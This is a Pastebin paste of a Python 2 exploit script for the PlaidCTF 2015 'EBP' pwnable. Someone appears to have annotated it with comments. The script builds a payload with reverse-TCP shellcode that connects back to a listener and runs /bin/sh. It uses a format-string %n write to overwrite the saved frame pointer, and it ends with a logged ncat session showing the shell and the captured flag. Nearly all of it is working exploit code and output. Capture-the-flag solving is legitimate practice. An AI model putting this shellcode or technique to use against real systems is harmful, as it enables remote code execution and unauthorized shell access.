PlaidCTF 2015 - EBP

a guest
Apr 22nd, 2015
936
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.56 KB | None | 0 0
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. #
  4. # PlaidCTF 2015
  5. # PWNABLE EBP - 160pts
  6. # Frame pointer overwrite
  7. #
  8. # danigargu @ w3b0n3s
  9. #
  10. # run as tcp server (debugging in local):
  11. # socat -d -d TCP-LISTEN:4545,fork EXEC:"./ebp"
  12. #
  13.  
  14. import socket
  15. from struct import pack, unpack
  16.  
# Challenge service the script connects to (as recorded on this page).
# Note: rev_ip/rev_port inside main() are a separate setting; they name the
# listener the shellcode connects back to, not this host.
HOST = '52.6.64.173'
PORT = 4545
  19.  
def get_connection(host, port):
    """Open a blocking IPv4 TCP connection to host:port and return the socket.

    The caller owns the returned socket and must close it. Any error raised
    by ``socket.connect`` (e.g. refused connection) propagates unchanged.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    return sock
  24.  
def make_write4(what, offset):
    """Return a printf-style format string of the form ``%<what>c%<offset>$n``.

    ``what`` becomes the field width of the ``%c`` conversion and ``offset``
    the positional argument index of the ``%n`` conversion. Both values are
    rendered with their ``str()`` form, so ints and strings are accepted alike.
    """
    return "%{0}c%{1}$n".format(what, offset)
  28.  
def main():
    """Build the payload, send it to HOST:PORT and print progress.

    Python 2 only as written (print statements, str used as a byte buffer).
    Errors are caught, printed and otherwise ignored (see the except below).
    """

    # Listener the shellcode connects back to. "XXX.XXX.XXX.XXX" is a
    # placeholder left by the author; socket.inet_aton() rejects it, so the
    # script raises (and prints the error) until a real address is filled in.
    rev_ip   = "XXX.XXX.XXX.XXX"
    rev_port = 55555

    # reverse tcp shellcode
    # rev_ip and rev_port are spliced into the byte string in network byte
    # order (inet_aton() and pack(">H") respectively).
    shellcode = (
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" +
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68" +
        socket.inet_aton(rev_ip) + "\x66\x68" + pack(">H", rev_port) +
        "\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66" +
        "\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0" +
        "\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0" +
        "\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73" +
        "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +
        "\xc0\xb0\x01\xcd\x80"
    )

    # Hard-coded address assumed for the input buffer; nothing below verifies
    # it at runtime, so a different build of the binary silently breaks this.
    buf = 0x804A080
    saved_ebp = "BBBB"
    junk = "A" * 100

    # Payload layout, byte offsets relative to buf:
    #   [0,100)   junk
    #   [100,104) saved_ebp (fake frame)
    #   [104,108) little-endian pointer = sc_addr
    #   [108,...) shellcode
    # sc_addr therefore points just past the pointer slot, at the shellcode.
    sc_addr = buf + len(junk) + len(saved_ebp) + 4
    payload = junk + saved_ebp + pack("<I", sc_addr) + shellcode
    # Address of the 4-byte saved_ebp slot inside buf (offset 100).
    fake_frame = buf + len(junk)

    try:
        print "[*] connecting to %s:%d" % (HOST, PORT)
        s = get_connection(HOST, PORT)
        print "[*] sending payload..."
        s.send(payload + "\n")
        # Responses are read only to keep the conversation in step; their
        # contents are never inspected, so a short or partial reply is not
        # detected.
        s.recv(0x400)

        # overwrite echo() saved ebp
        print "[*] overwriting echo() saved ebp"
        s.send(make_write4(fake_frame, 4) + "\n")        
        s.recv(0x400)

        # provoke break in while(1) at main() to get control of EIP
        s.close()

    # Catches everything (including the inet_aton() failure above), prints
    # it and returns normally; the socket is not closed on this path.
    except Exception,e:
        print e
  72.  
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()
  75.  
  76.  
  77. """
  78. $ ncat -lvvp 55555
  79. Ncat: Version 6.47 ( http://nmap.org/ncat )
  80. Ncat: Listening on :::55555
  81. Ncat: Listening on 0.0.0.0:55555
  82. Ncat: Connection from 52.6.64.173.
  83. Ncat: Connection from 52.6.64.173:43058.
  84. id
  85. uid=1001(problem) gid=1001(problem) groups=1001(problem)
  86. ls -l /home/problem
  87. total 12
  88. -r-xr-x--x 1 root root 7568 Apr 17 22:31 ebp
  89. -r--r--r-- 1 root root   32 Apr 17 22:31 flag.txt
  90. cat /home/problem/flag.txt
  91. who_needs_stack_control_anyway
  92. """